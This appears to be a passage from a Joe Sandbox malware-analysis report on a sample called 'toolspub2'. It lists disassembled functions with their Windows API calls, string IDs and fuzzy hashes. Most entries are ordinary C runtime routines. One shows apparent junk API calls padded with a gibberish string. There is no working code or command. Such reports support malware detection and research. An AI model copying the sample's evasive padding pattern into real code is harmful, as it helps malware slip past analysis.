                                                                                                                                                              • Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Pointer$AddressEncodeProc$Decode$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                                                                                                                              • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL$PN7w
                                                                                                                                                              • API String ID: 3732613303-4188625860
                                                                                                                                                              • Opcode ID: ef3dbb146f5969fb64acee3857677eec3959f544dd1873165fc4536494f17991
                                                                                                                                                              • Instruction ID: 44d8534853f393bc9b69529474bd00465de58c7f882759ba68c467c4d7ed23e2
                                                                                                                                                              • Opcode Fuzzy Hash: ef3dbb146f5969fb64acee3857677eec3959f544dd1873165fc4536494f17991
                                                                                                                                                              • Instruction Fuzzy Hash: CA316F31D10210EBC721AFB5AD4965A3AE1FB88762710523BEA14F26F0DB79A441CF4C
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • SetCommState.KERNEL32(00000000,00000000), ref: 00429737
                                                                                                                                                              • RemoveDirectoryA.KERNEL32(00000000), ref: 0042973F
                                                                                                                                                              • SetSystemPowerState.KERNEL32(00000000,00000000), ref: 00429749
                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(?,00000000), ref: 00429759
                                                                                                                                                              • WriteConsoleInputW.KERNEL32(00000000,00000000,00000000,?), ref: 0042976A
                                                                                                                                                              • GetCompressedFileSizeA.KERNEL32(00000000,?), ref: 00429777
                                                                                                                                                              • CreateFileW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042978B
                                                                                                                                                              • FoldStringA.KERNEL32(00000000,wafurubipagogizojeca yelirahipotuluxi mutezucit,00000000,?,00000000), ref: 004297A1
                                                                                                                                                              • ReplaceFileA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004297B3
                                                                                                                                                              Strings
                                                                                                                                                              • wafurubipagogizojeca yelirahipotuluxi mutezucit, xrefs: 0042979A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$DirectoryState$CommCompressedConsoleCreateFoldInputPowerRemoveReplaceSizeStringSystemWindowsWrite
                                                                                                                                                              • String ID: wafurubipagogizojeca yelirahipotuluxi mutezucit
                                                                                                                                                              • API String ID: 1778575968-1505459847
                                                                                                                                                              • Opcode ID: 912685c5b356c61fed35d2224baf74f417aee7819b64a6c7e5cead4b159f859a
                                                                                                                                                              • Instruction ID: 095224edc76ccae2854af88811de5b53715052bc8486373523782acf4feea8b6
                                                                                                                                                              • Opcode Fuzzy Hash: 912685c5b356c61fed35d2224baf74f417aee7819b64a6c7e5cead4b159f859a
                                                                                                                                                              • Instruction Fuzzy Hash: 5D114435248341EFF354AF90DD4AFA937B4AB4CB02F504529F745AA2E0D6B45440CF5A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 00405ABB
                                                                                                                                                                • Part of subcall function 00408B31: RaiseException.KERNEL32(00000004,?,?,004041F4), ref: 00408B73
                                                                                                                                                              • std::exception::exception.LIBCMT ref: 00405A9C
                                                                                                                                                                • Part of subcall function 00407D4C: std::exception::_Copy_str.LIBCMT ref: 00407D67
                                                                                                                                                              • std::exception::exception.LIBCMT ref: 00405ADC
                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 00405AFB
                                                                                                                                                              • std::exception::exception.LIBCMT ref: 00405B18
                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 00405B37
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_
                                                                                                                                                              • String ID: PZ@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                              • API String ID: 1430062303-1864213188
                                                                                                                                                              • Opcode ID: 2d755e540355c7d7f9ea4764411c0329434322430d7e1a329f173d656397f190
                                                                                                                                                              • Instruction ID: fadb92b1054d3d4508b2874e9053bbdacf34fe293ecdbc7888de4e06e1023810
                                                                                                                                                              • Opcode Fuzzy Hash: 2d755e540355c7d7f9ea4764411c0329434322430d7e1a329f173d656397f190
                                                                                                                                                              • Instruction Fuzzy Hash: 7D1160B14083019BC304EF59C54154FBBF8AED8748F10492FB185B7291DBB4A508CBAB
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 00409F12
                                                                                                                                                              • _malloc.LIBCMT ref: 00409F51
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 00409F80
                                                                                                                                                              • LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 00409F9C
                                                                                                                                                              • LCMapStringW.KERNEL32(?,?,?,00000000,?,?), ref: 00409FD5
                                                                                                                                                              • _malloc.LIBCMT ref: 0040A00E
                                                                                                                                                                • Part of subcall function 00407F97: __FF_MSGBANNER.LIBCMT ref: 00407FB0
                                                                                                                                                                • Part of subcall function 00407F97: __NMSG_WRITE.LIBCMT ref: 00407FB7
                                                                                                                                                                • Part of subcall function 00407F97: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0040A678,00000000,00000001,00000000,?,0040BB44,00000018,0042CF00,0000000C,0040BBD4), ref: 00407FDC
                                                                                                                                                              • LCMapStringW.KERNEL32(?,?,?,?,00000000,?), ref: 0040A03B
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0040A05A
                                                                                                                                                              • __freea.LIBCMT ref: 0040A064
                                                                                                                                                              • __freea.LIBCMT ref: 0040A06D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharMultiStringWide$__freea_malloc$AllocateHeap
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2350834463-0
                                                                                                                                                              • Opcode ID: d61e90fc5190e7e20fd9e1a27e259b527235d12957ac79bb67152e93b52fda89
                                                                                                                                                              • Instruction ID: 7acae93386c8d0666369f6d5593fe410aebdb1f02d1067f632a3b2be1d791924
                                                                                                                                                              • Opcode Fuzzy Hash: d61e90fc5190e7e20fd9e1a27e259b527235d12957ac79bb67152e93b52fda89
                                                                                                                                                              • Instruction Fuzzy Hash: 6051BF7290020EAFCF119FA4CC818AE7BB6FB48358F18413AF515F22A1D7398C61DB59
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00406A50
                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00406A76
                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 00406B09
                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00406B1E
                                                                                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 00406B39
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::locale::facet::_
                                                                                                                                                              • String ID: bad cast
                                                                                                                                                              • API String ID: 2895652726-3145022300
                                                                                                                                                              • Opcode ID: 1dd3f9784271673de89be40fea72fe8d047e25f0b85be130dc9353411ab2391b
                                                                                                                                                              • Instruction ID: d383be67998852100b4c36a8a5fca670dd3f7b803c7398b72b44daa99cff2c7e
                                                                                                                                                              • Opcode Fuzzy Hash: 1dd3f9784271673de89be40fea72fe8d047e25f0b85be130dc9353411ab2391b
                                                                                                                                                              • Instruction Fuzzy Hash: E1310171A043119BC714EF14C881B5ABBA0FB44724F218A3EE497B72D1DB38BD44CB9A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • __getptd_noexit.LIBCMT ref: 0040901C
                                                                                                                                                                • Part of subcall function 0040C187: GetLastError.KERNEL32(?,?,0040A8F4,00407F83,?,?,00407D41,?), ref: 0040C18B
                                                                                                                                                                • Part of subcall function 0040C187: ___set_flsgetvalue.LIBCMT ref: 0040C199
                                                                                                                                                                • Part of subcall function 0040C187: __calloc_crt.LIBCMT ref: 0040C1AD
                                                                                                                                                                • Part of subcall function 0040C187: DecodePointer.KERNEL32(00000000,?,?,0040A8F4,00407F83,?,?,00407D41,?), ref: 0040C1C7
                                                                                                                                                                • Part of subcall function 0040C187: __initptd.LIBCMT ref: 0040C1D6
                                                                                                                                                                • Part of subcall function 0040C187: GetCurrentThreadId.KERNEL32 ref: 0040C1DD
                                                                                                                                                                • Part of subcall function 0040C187: SetLastError.KERNEL32(00000000,?,?,0040A8F4,00407F83,?,?,00407D41,?), ref: 0040C1F5
                                                                                                                                                              • __calloc_crt.LIBCMT ref: 0040903E
                                                                                                                                                              • __get_sys_err_msg.LIBCMT ref: 0040905C
                                                                                                                                                              • _strcpy_s.LIBCMT ref: 00409064
                                                                                                                                                              • __invoke_watson.LIBCMT ref: 00409079
                                                                                                                                                              Strings
                                                                                                                                                              • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 00409029, 0040904C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast__calloc_crt$CurrentDecodePointerThread___set_flsgetvalue__get_sys_err_msg__getptd_noexit__initptd__invoke_watson_strcpy_s
                                                                                                                                                              • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                                                                                              • API String ID: 69636372-798102604
                                                                                                                                                              • Opcode ID: d860c3ecbfeb18338d48f3cebc6bb86569337b8885aa831edaa1a818a86fb787
                                                                                                                                                              • Instruction ID: 0b2e0f78feb1162477e54297166a760c5e285535bf36ad1fafac8514ac5e128f
                                                                                                                                                              • Opcode Fuzzy Hash: d860c3ecbfeb18338d48f3cebc6bb86569337b8885aa831edaa1a818a86fb787
                                                                                                                                                              • Instruction Fuzzy Hash: 4DF024B26042106BCB30392B4C81D6BB29DCB91768B11453FF60AB72D3EA3E8C41829D
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 004055D3
                                                                                                                                                              • std::exception::exception.LIBCMT ref: 0040560E
                                                                                                                                                                • Part of subcall function 00407D4C: std::exception::_Copy_str.LIBCMT ref: 00407D67
                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 00405625
                                                                                                                                                                • Part of subcall function 00408B31: RaiseException.KERNEL32(00000004,?,?,004041F4), ref: 00408B73
                                                                                                                                                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040562C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: std::_$Copy_strExceptionException@8Locinfo::_Locinfo_ctorLockitLockit::_RaiseThrowstd::exception::_std::exception::exception
                                                                                                                                                              • String ID: PZ@$bad locale name
                                                                                                                                                              • API String ID: 73090415-414459017
                                                                                                                                                              • Opcode ID: 265d925210115b29a7932d0a3ef48d4c0e73aebc9e4c7f18131d7780433d9712
                                                                                                                                                              • Instruction ID: 70fc0caea9c7c166b3bd10431bfc68367145f887a61b147fa1e0a6e8c1cf2896
                                                                                                                                                              • Opcode Fuzzy Hash: 265d925210115b29a7932d0a3ef48d4c0e73aebc9e4c7f18131d7780433d9712
                                                                                                                                                              • Instruction Fuzzy Hash: 2F1156B15487809FC311DF598481A5BFBE4BB68714F844A2FF1D963781C778A508CBAB
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • _malloc.LIBCMT ref: 00408502
                                                                                                                                                                • Part of subcall function 00407F97: __FF_MSGBANNER.LIBCMT ref: 00407FB0
                                                                                                                                                                • Part of subcall function 00407F97: __NMSG_WRITE.LIBCMT ref: 00407FB7
                                                                                                                                                                • Part of subcall function 00407F97: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0040A678,00000000,00000001,00000000,?,0040BB44,00000018,0042CF00,0000000C,0040BBD4), ref: 00407FDC
                                                                                                                                                              • std::exception::exception.LIBCMT ref: 00408537
                                                                                                                                                              • std::exception::exception.LIBCMT ref: 00408551
                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 00408562
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                                                                              • String ID: L=C$bad allocation
                                                                                                                                                              • API String ID: 615853336-1140591844
                                                                                                                                                              • Opcode ID: 0dfe834c578b0d95ce2b3b748650df0acf3b29a1257c5051eaa95e1b4484a61b
                                                                                                                                                              • Instruction ID: 3ae25ba80ab44ad477bf62c94f258e5f94ee485d823ca0a99b4dd2091dcfd21f
                                                                                                                                                              • Opcode Fuzzy Hash: 0dfe834c578b0d95ce2b3b748650df0acf3b29a1257c5051eaa95e1b4484a61b
                                                                                                                                                              • Instruction Fuzzy Hash: F2F0F930A0421A7ADB04EF15DD02A5E3B799F80718F20403FF400B61E2DFBCDA419A4E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • __getptd.LIBCMT ref: 0040CDED
                                                                                                                                                                • Part of subcall function 0040C200: __getptd_noexit.LIBCMT ref: 0040C203
                                                                                                                                                                • Part of subcall function 0040C200: __amsg_exit.LIBCMT ref: 0040C210
                                                                                                                                                              • __getptd.LIBCMT ref: 0040CDFE
                                                                                                                                                              • __getptd.LIBCMT ref: 0040CE0C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                              • String ID: MOC$RCC$csm
                                                                                                                                                              • API String ID: 803148776-2671469338
                                                                                                                                                              • Opcode ID: 7949cde81220e32a5ab24ff03e5f8c69654839aa6cf9eb064e58a1c80bd53bbf
                                                                                                                                                              • Instruction ID: 2c2391279a0edf5a1ecc72825b3f41cb85fd91b10ea7dca358035dda9bdca57f
                                                                                                                                                              • Opcode Fuzzy Hash: 7949cde81220e32a5ab24ff03e5f8c69654839aa6cf9eb064e58a1c80bd53bbf
                                                                                                                                                              • Instruction Fuzzy Hash: B5E0C934504104CFD71097A5C08A7693695AB84318F2506F7E41CABAB3C73CA860959A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • __CreateFrameInfo.LIBCMT ref: 0040D0A6
                                                                                                                                                                • Part of subcall function 00408E5C: __getptd.LIBCMT ref: 00408E6A
                                                                                                                                                                • Part of subcall function 00408E5C: __getptd.LIBCMT ref: 00408E78
                                                                                                                                                              • __getptd.LIBCMT ref: 0040D0B0
                                                                                                                                                                • Part of subcall function 0040C200: __getptd_noexit.LIBCMT ref: 0040C203
                                                                                                                                                                • Part of subcall function 0040C200: __amsg_exit.LIBCMT ref: 0040C210
                                                                                                                                                              • __getptd.LIBCMT ref: 0040D0BE
                                                                                                                                                              • __getptd.LIBCMT ref: 0040D0CC
                                                                                                                                                              • __getptd.LIBCMT ref: 0040D0D7
                                                                                                                                                              • _CallCatchBlock2.LIBCMT ref: 0040D0FD
                                                                                                                                                                • Part of subcall function 00408F01: __CallSettingFrame@12.LIBCMT ref: 00408F4D
                                                                                                                                                                • Part of subcall function 0040D1A4: __getptd.LIBCMT ref: 0040D1B3
                                                                                                                                                                • Part of subcall function 0040D1A4: __getptd.LIBCMT ref: 0040D1C1
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1602911419-0
                                                                                                                                                              • Opcode ID: e538ce5dd66796c02ea310f58a6a853e35e3a6571055be479ec245675d64c2e6
                                                                                                                                                              • Instruction ID: 88f72708f33c26c08780041cd2be50bb14ce52e09a87619738af0235c69c1c31
                                                                                                                                                              • Opcode Fuzzy Hash: e538ce5dd66796c02ea310f58a6a853e35e3a6571055be479ec245675d64c2e6
                                                                                                                                                              • Instruction Fuzzy Hash: E911B7B1D00209DFDB00EFA5D545BAE77B0FF04314F20816EE864AB292DB7899159B98
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • ___BuildCatchObject.LIBCMT ref: 0040D43E
                                                                                                                                                                • Part of subcall function 0040D399: ___BuildCatchObjectHelper.LIBCMT ref: 0040D3CF
                                                                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 0040D455
                                                                                                                                                              • ___FrameUnwindToState.LIBCMT ref: 0040D463
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                                                                              • String ID: csm$csm
                                                                                                                                                              • API String ID: 2163707966-3733052814
                                                                                                                                                              • Opcode ID: eb6fac34a6ad23033f80fdbd32dd719b7d461b59595acb891ed0c7b3c82ac2b9
                                                                                                                                                              • Instruction ID: 0ee9aba2f99e48f19686b3c1e9e846d58845e68f87dd79ce8f07be3f155cb553
                                                                                                                                                              • Opcode Fuzzy Hash: eb6fac34a6ad23033f80fdbd32dd719b7d461b59595acb891ed0c7b3c82ac2b9
                                                                                                                                                              • Instruction Fuzzy Hash: 22014F71801109BBCF126F91CC45EEB7F6AEF04344F00802AFD18251A1D779A971DBA9
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DecodePointer__call_reportfault_raise
                                                                                                                                                              • String ID: PN7w
                                                                                                                                                              • API String ID: 2042925533-3458938079
                                                                                                                                                              • Opcode ID: e694b38d64a2a4e87c4582f6ba5621aa52b5d7db603c081b50c03ad274161617
                                                                                                                                                              • Instruction ID: 3a2720c5c4e2553745fcca75dc565e4967b783802b6c8afcdff5ee4720be119e
                                                                                                                                                              • Opcode Fuzzy Hash: e694b38d64a2a4e87c4582f6ba5621aa52b5d7db603c081b50c03ad274161617
                                                                                                                                                              • Instruction Fuzzy Hash: 0DE09A6024030561FE2233B21D4BBAA21254F81B09F08803F7B04B90C2EEFE8620816F
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • ___libm_error_support.LIBCMT ref: 00407EF5
                                                                                                                                                                • Part of subcall function 0040A997: DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,00407EFA), ref: 0040A9B5
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
